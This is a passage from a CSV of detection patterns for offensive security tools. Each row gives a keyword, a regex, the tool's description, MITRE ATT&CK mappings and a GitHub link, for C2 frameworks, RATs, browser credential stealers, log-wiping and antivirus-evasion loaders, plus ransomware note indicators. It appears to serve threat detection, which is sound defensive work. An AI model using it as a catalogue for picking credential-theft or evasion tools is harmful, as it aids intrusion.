profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","pipe name","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","52250" "*mojo.5688.8052.35780273329370473##*",".{0,1000}mojo\.5688\.8052\.35780273329370473\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","pipe name","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","52251" "*mojo_##*",".{0,1000}mojo_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","52252" "*monero2john.py*",".{0,1000}monero2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52254" "*money2john.py*",".{0,1000}money2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52255" "*mongodb2john.js*",".{0,1000}mongodb2john\.js.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52256" "*Monitor KeyLogger output from a specific agent*",".{0,1000}Monitor\sKeyLogger\soutput\sfrom\sa\sspecific\sagent.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - 
T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","52257" "*Monitor-FBIWantedList -searchName *",".{0,1000}Monitor\-FBIWantedList\s\-searchName\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","52258" "*Monkey Island v*_windows.exe*",".{0,1000}Monkey\sIsland\sv.{0,1000}_windows\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52260" "*monkey*tunnel.py*",".{0,1000}monkey.{0,1000}tunnel\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52261" "*monkey\infection_monkey*",".{0,1000}monkey\\infection_monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52262" 
"*monkey_island.exe*",".{0,1000}monkey_island\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52263" "*monkey32.exe *",".{0,1000}monkey32\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52264" "*monkey64.exe *",".{0,1000}monkey64\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52265" "*monkey-linux-32*",".{0,1000}monkey\-linux\-32.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52266" "*monkey-linux-64*",".{0,1000}monkey\-linux\-64.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52267" 
"*monkey-windows-32.exe*",".{0,1000}monkey\-windows\-32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52268" "*monkey-windows-64.exe*",".{0,1000}monkey\-windows\-64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52269" "*monoxgas/Koppeling*",".{0,1000}monoxgas\/Koppeling.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","52270" "*monoxgas/sRDI*",".{0,1000}monoxgas\/sRDI.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","52271" "*monti5o7lvyrpyk26lqofnfvajtyqruwatlfaazgm3zskt3xiktudwid.onion*",".{0,1000}monti5o7lvyrpyk26lqofnfvajtyqruwatlfaazgm3zskt3xiktudwid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52272" "*moom825/Discord-RAT-2.0*",".{0,1000}moom825\/Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","52273" "*moom825/xeno-rat*",".{0,1000}moom825\/xeno\-rat.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","52274" "*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","52275" "*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","52276" "*moonwalk finish*",".{0,1000}moonwalk\sfinish.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52277" "*moonwalk get *history*",".{0,1000}moonwalk\sget\s.{0,1000}history.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52278" "*moonwalk start*",".{0,1000}moonwalk\sstart.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52279" "*moremo123123@cock.li*",".{0,1000}moremo123123\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns 
retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52280" "*morphHTA*",".{0,1000}morphHTA.{0,1000}","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","N/A","6","522","130","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z","52281" "*mortar-loader.html*",".{0,1000}mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","52282" "*mortar-main.zip*",".{0,1000}mortar\-main\.zip.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","52283" "*mosajjal/dnspot*",".{0,1000}mosajjal\/dnspot.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","52284" "*mosquitto2john.py*",".{0,1000}mosquitto2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52285" "*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52286" "*Mount-VolumeShadowCopy*",".{0,1000}Mount\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","52287" "*mousejack*",".{0,1000}mousejack.{0,1000}","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","10","1329","261","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z","52288" "*Mouselogger.ps1*",".{0,1000}Mouselogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52289" 
"*mouseshaker.*",".{0,1000}mouseshaker\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","52290" "*MoveKit-master.zip*",".{0,1000}MoveKit\-master\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 
Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52292" "*move-msbuild * http move.csproj*",".{0,1000}move\-msbuild\s.{0,1000}\shttp\smove\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52293" "*move-pre-custom-file *.exe *",".{0,1000}move\-pre\-custom\-file\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52294" "*movfuscator*",".{0,1000}movfuscator.{0,1000}","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","N/A","10","9766","405","2024-05-29T18:29:10Z","2015-06-16T01:49:40Z","52295" "*Moziedx765lla Firefedx765ox*",".{0,1000}Moziedx765lla\sFirefedx765ox.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","52296" "*Mozilla/5.0 (*-bit) dnstwist*",".{0,1000}Mozilla\/5\.0\s\(.{0,1000}\-bit\)\sdnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. 
Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#useragent","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","52297" "*Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like TsunamiWave*",".{0,1000}Mozilla\/5\.0\s\(compatible,\sMSIE\s11,\sWindows\sNT\s6\.3\;\sTrident\/7\.0\;\srv\:11\.0\)\slike\sTsunamiWave.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","#useragent","user-agent","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52298" "*Mozilla/5.0 (compatible; ArgusBot/1.0*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sArgusBot\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","52299" "*Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/7.0; Specula; Microsoft Outlook*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sMSIE\s10\.0\;\sWindows\sNT\s10\.0\;\sWOW64\;\sTrident\/7\.0\;\sSpecula\;\sMicrosoft\sOutlook.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","#useragent","default UA 
